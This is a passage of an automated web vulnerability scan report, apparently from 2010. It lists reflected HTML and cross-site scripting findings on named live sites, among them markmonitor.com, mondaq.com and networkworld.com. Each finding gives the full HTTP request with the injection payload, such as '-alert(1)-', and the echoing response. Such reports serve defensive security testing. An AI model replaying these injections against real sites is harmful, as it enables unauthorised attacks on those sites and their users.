Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-wwe/?1ab60"><a>ddf1e94f83d=1" id="campaign-form">
...[SNIP]...
1.116. http://www.markmonitor.com/cta/request/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/request/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 500ea"><a>15de34149db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/request/?500ea"><a>15de34149db=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:26 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31361
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<form method="post" action="/cta/request/?500ea"><a>15de34149db=1" id="campaign-form">
...[SNIP]...
1.117. http://www.markmonitor.com/cta/wp-6steps/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/wp-6steps/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c56"><a>d38010cc63a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-6steps/?b2c56"><a>d38010cc63a=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:10 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31984
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-6steps/?b2c56"><a>d38010cc63a=1" id="campaign-form">
...[SNIP]...
The value of the Lead_Source_Mktg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0859"><a>a9602da5291 was submitted in the Lead_Source_Mktg parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-counterfeit/?Lead_Source_Mktg=HPb0859"><a>a9602da5291 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:57:15 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31725
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-counterfeit/?Lead_Source_Mktg=HPb0859"><a>a9602da5291" id="campaign-form">
...[SNIP]...
1.119. http://www.markmonitor.com/cta/wp-counterfeit/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/wp-counterfeit/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3ca"><a>ec80de027e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-counterfeit/?cd3ca"><a>ec80de027e4=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 01:57:36 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31684
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-counterfeit/?cd3ca"><a>ec80de027e4=1" id="campaign-form">
...[SNIP]...
1.120. http://www.markmonitor.com/cta/wp-paidsearch/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/wp-paidsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90057"><a>1b139485ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-paidsearch/?90057"><a>1b139485ace=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:19 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31667
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-paidsearch/?90057"><a>1b139485ace=1" id="campaign-form">
...[SNIP]...
1.121. http://www.markmonitor.com/cta/wp-protectingbrand/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.markmonitor.com
Path: /cta/wp-protectingbrand/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 451d4"><a>54700e274a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-protectingbrand/?451d4"><a>54700e274a9=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:10 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 32293
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-protectingbrand/?451d4"><a>54700e274a9=1" id="campaign-form">
...[SNIP]...
1.122. https://www.markmonitor.com/cta/bji-winter2009/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/bji-winter2009/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f89d"><a>b7bae97518d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/bji-winter2009/?3f89d"><a>b7bae97518d=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:03 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 32021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/bji-winter2009/?3f89d"><a>b7bae97518d=1" id="campaign-form">
...[SNIP]...
1.123. https://www.markmonitor.com/cta/cs-AAA/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/cs-AAA/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55eef"><a>a5127f15360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-AAA/?55eef"><a>a5127f15360=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:04:41 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31993
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-AAA/?55eef"><a>a5127f15360=1" id="campaign-form">
...[SNIP]...
1.124. https://www.markmonitor.com/cta/cs-Deckers/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/cs-Deckers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9fe8"><a>e5442ef4e20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cta/cs-Deckers/?b9fe8"><a>e5442ef4e20=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:00 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 32134
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-deckers/?b9fe8"><a>e5442ef4e20=1" id="campaign-form">
...[SNIP]...
1.125. https://www.markmonitor.com/cta/cs-wwe/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/cs-wwe/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a5c"><a>29e9f4a8d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/cs-wwe/?d3a5c"><a>29e9f4a8d17=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:03 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31582
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/cs-wwe/?d3a5c"><a>29e9f4a8d17=1" id="campaign-form">
...[SNIP]...
1.126. https://www.markmonitor.com/cta/wp-6steps/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/wp-6steps/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a98"><a>1460754cfb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-6steps/?41a98"><a>1460754cfb3=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:04:36 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31984
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-6steps/?41a98"><a>1460754cfb3=1" id="campaign-form">
...[SNIP]...
1.127. https://www.markmonitor.com/cta/wp-paidsearch/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/wp-paidsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c193"><a>029c8521993 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-paidsearch/?3c193"><a>029c8521993=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:06 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31667
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-paidsearch/?3c193"><a>029c8521993=1" id="campaign-form">
...[SNIP]...
1.128. https://www.markmonitor.com/cta/wp-protectingbrand/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://www.markmonitor.com
Path: /cta/wp-protectingbrand/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1724"><a>8367eb73f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-protectingbrand/?d1724"><a>8367eb73f42=1 HTTP/1.1
Host: www.markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:05:07 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 32293
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" conten
...[SNIP]...
<form method="post" action="/cta/wp-protectingbrand/?d1724"><a>8367eb73f42=1" id="campaign-form">
...[SNIP]...
1.129. http://www.mondaq.com/article.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mondaq.com
Path: /article.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71ad"-alert(1)-"52659712bc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article.asp?f71ad"-alert(1)-"52659712bc9=1 HTTP/1.1
Host: www.mondaq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:07:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html; Charset=utf-8
Expires: Sat, 11 Dec 2010 02:07:54 GMT
Set-Cookie: ASPSESSIONIDSAQCDSAT=NMLPIACBCJKCNJCCMOECPJLI; path=/
Cache-control: no-cache

<sc
...[SNIP]...
<!--//begin var onArticle = 1; var hidePrint = 1; var normalPrint = 0; var printurl = "/article.asp"; var printqs = "f71ad"-alert(1)-"52659712bc9=1";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a49f3'-alert(1)-'c37851e1f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa49f3'-alert(1)-'c37851e1f90/2007/101107-asia-registry-to-crack-down.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=295
Date: Sat, 11 Dec 2010 02:08:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76464
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c592e'-alert(1)-'6f23b83a93b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2007c592e'-alert(1)-'6f23b83a93b/101107-asia-registry-to-crack-down.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=279
Date: Sat, 11 Dec 2010 02:08:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76464
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7dc0'-alert(1)-'9c4eac0dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2007/101107-asia-registry-to-crack-down.htmlc7dc0'-alert(1)-'9c4eac0dedc HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Dec 2010 02:08:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 11 Dec 2010 02:08:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292033311020175; path=/; expires=Mon, 10-Dec-12 02:08:31 GMT
Content-Length: 74872
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c9bf'-alert(1)-'76984cd5f6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2007/101107-asia-registry-to-crack-down.html?6c9bf'-alert(1)-'76984cd5f6d=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Sat, 11 Dec 2010 02:08:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123711
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab5e4'-alert(1)-'eb44345b11d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsab5e4'-alert(1)-'eb44345b11d/2009/043009-facebook-phishing.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=289
Date: Sat, 11 Dec 2010 02:08:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76434
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 632d4'-alert(1)-'b49cc1f4677 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2009632d4'-alert(1)-'b49cc1f4677/043009-facebook-phishing.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=299
Date: Sat, 11 Dec 2010 02:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76434
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a692'-alert(1)-'46e03c44d9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
